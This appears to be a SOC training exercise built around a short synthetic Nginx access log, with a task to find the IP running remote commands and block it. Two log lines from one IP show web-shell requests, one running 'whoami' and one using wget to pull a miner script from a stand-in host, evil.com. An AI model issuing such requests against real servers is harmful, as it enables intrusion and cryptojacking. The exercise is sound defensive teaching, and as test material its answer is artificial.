Security Operations Center (SOC)

🚨 CRITICAL ALERT: Anomalous Activity Detected

The web server EDR detected 99% CPU usage. We extracted the latest Nginx access logs (access.log). Your goal is to analyze the log, identify the attacker's IP address executing remote commands (RCE), and add it to the perimeter Firewall blacklist.

10.0.0.52 - - [14/Aug/2026:10:15:01 +0200] "GET /index.php HTTP/1.1" 200 4512 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" 10.0.0.11 - - [14/Aug/2026:10:15:05 +0200] "GET /assets/style.css HTTP/1.1" 200 1024 "Mozilla/5.0 (Macintosh; Intel Mac OS X)" 10.0.0.52 - - [14/Aug/2026:10:15:08 +0200] "GET /contact.php HTTP/1.1" 200 3100 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" 10.0.0.88 - - [14/Aug/2026:10:16:10 +0200] "POST /login.php HTTP/1.1" 302 0 "Mozilla/5.0 (X11; Linux x86_64)" 185.12.99.102 - - [14/Aug/2026:10:16:22 +0200] "GET /uploads/image.php?cmd=whoami HTTP/1.1" 200 33 "curl/7.68.0" 185.12.99.102 - - [14/Aug/2026:10:16:25 +0200] "GET /uploads/image.php?cmd=wget+http://evil.com/miner.sh HTTP/1.1" 200 0 "curl/7.68.0" 10.0.0.52 - - [14/Aug/2026:10:16:30 +0200] "GET /about.php HTTP/1.1" 200 2800 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"